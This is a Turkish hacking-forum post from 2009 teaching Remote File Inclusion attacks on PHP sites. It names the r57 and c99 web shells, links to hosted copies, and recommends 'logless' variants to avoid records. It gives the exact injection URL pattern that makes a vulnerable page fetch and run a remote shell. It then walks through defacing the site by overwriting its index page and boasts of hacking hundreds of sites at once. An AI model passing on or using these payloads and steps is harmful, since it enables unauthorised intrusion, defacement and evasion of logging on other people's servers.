Derebahçe ~ GençliK
Hoşgeldiniz !
Üye olmadan forumdan yarar sağlayamazsınız.
Canlı konuşma için sitede başlık sayfasının altındaki chat box'a konuşabilirsiniz !
Moderatör Alımları Başlamıştır.
İyi Eğlenceler..



 
AnasayfaaFFéTméZ ~ TéaMKayıt OlGiriş yap

Paylaş | 
 

 Web Hack | RFI [ Remote File Inclusioın ] Açığı

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
By.BiCi
Admin
Admin


Rep Gücü : 401
Rep Puanı : 10

MesajKonu: Web Hack | RFI [ Remote File Inclusioın ] Açığı   Salı Mart 17, 2009 10:05 pm

Arkadaşlar baktım ki bu bölümde saçma, gereksiz ve de doğal olarak işe yaramayan konular açılmış. Bu kötü gidişe dur demek için ben bi yöntem sunucam bugün ve inş. bundan sonra o tür konuları bidaha görmeyiz, gerçekçi yollardan devam ederiz.

Nedir bu RFI be aga fln demeyin bu RFI, SQL kadar baba olmasa da en yaygın yöntemdir diyebiliriz.
x.php sayfası vardır ve x.php sayfasında webmasterımızın karışılıksız bıraktığı bi girdi vardır. O girdiye değer vermemiştir. O girdiye biz "root
" diyelim. Bu girdinin değeri olmadığı zaman bizim shellimizi yiyebilir demektir. Peki nasıl shellimizi yedirebiliriz? Önce shell nedir öğrenelim. Shell diyince aklımıza ilk olarak r57 ve c99 bu ikisini bileceğiz arkadaşlar. Bunlar temel sheller ve açıkçası en çok kullanılanlar. Bunların logsuz, kendinden masslı hatta c99'un da c100 çeşidi çıktı. Logsuz kullanmanızı tavsiye ederim çünkü log tutmaz, yani kayıt tutmaz. Logsuz bi-iki shell örneği vereyim size hemen.
r57:
http://karavana.gen.tr/r.txt
c99: http://karavana.gen.tr/c99.txt.
Peki nasıl kullanırız biz bu shelleri derseniz hemen biz geyiği bırakıp x.php sayfasına ve "root" değerine geri dönelim.

Dediğim gibi şimdi x.php sayfamızda "root" girdisi karşılıksız bırakılmış ve biz hemen dolduruyoruz. Bu karışılıksız bırakma bir açıktır arkadaşlar. Nasıl dolduruyoruz derseniz sayfa.php?açıkbırakılangirdi=shelladresi? [ sonuna o
?'i mutlaka ekleyin. ] yani

siteadresi.com/x.php?root=http://karavana.gen.tr/r.txt? [ parçaları ayrı ayrı gösterdim ]

olarak kullanıcaz. Bu şartlarda siteye shell sokmuş olduk. Eğer yazma izniniz varsa arkadaşlar bu shellerde sayfalarınızı editleyebilir indexinizi upload edebilirsiniz. Tabiki sadece Safe Mode Offken ve yazma izni varken. Yani CHMOD 0777 iken. Bunu nası anlarsınız? Yukarıda Safe Mode: OFF[No Security] yazar. Ve aşağıda dosyanın karşısındaki boşlukta yeşil olarak r-rw fln yazar. Orda hemen o yazının sağında 3 tane kutu gibi simge vardır. Biz editlemek için ortadakini kullanırız üstünde kalem işareti vardır. O kalem işaretli olana tıkladığımızda o sayfanın kodları bulunan sayfa açılır. Yani diyelim biz aa.com/x.php?root=http://karavana.gen.tr/r.txt? adresinde açık bulduk shell soktuk tarif ettiğim gibi geldik aa.com/ ve aa.com/aaa'daki yani dizinlerindeki izin verilen dosyaları editleriz. O kod satırlarına geldiğimizde index kodlarımızı yapıştırırız sonra hemen yukarıda SAVE yazar buna tıklarız ve indeximiz kaydedilmiş olur. Bu RFI açığında server rootlayabilir aynı anda 600-700 site hackleyebilirsiniz.


Biliyorum karışık oldu ama en kısa zamanda video çekicem

Infiltrat0r

Not: Ben video çekene kadar RFI, c99, r57, CHMOD konusunda araştırma yaparsanız bişeyler öğrenebilirsiniz
Sayfa başına dön Aşağa gitmek
 
Web Hack | RFI [ Remote File Inclusioın ] Açığı
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Derebahçe ~ GençliK :: Hacking area :: Web-Domain Hacking-
Buraya geçin: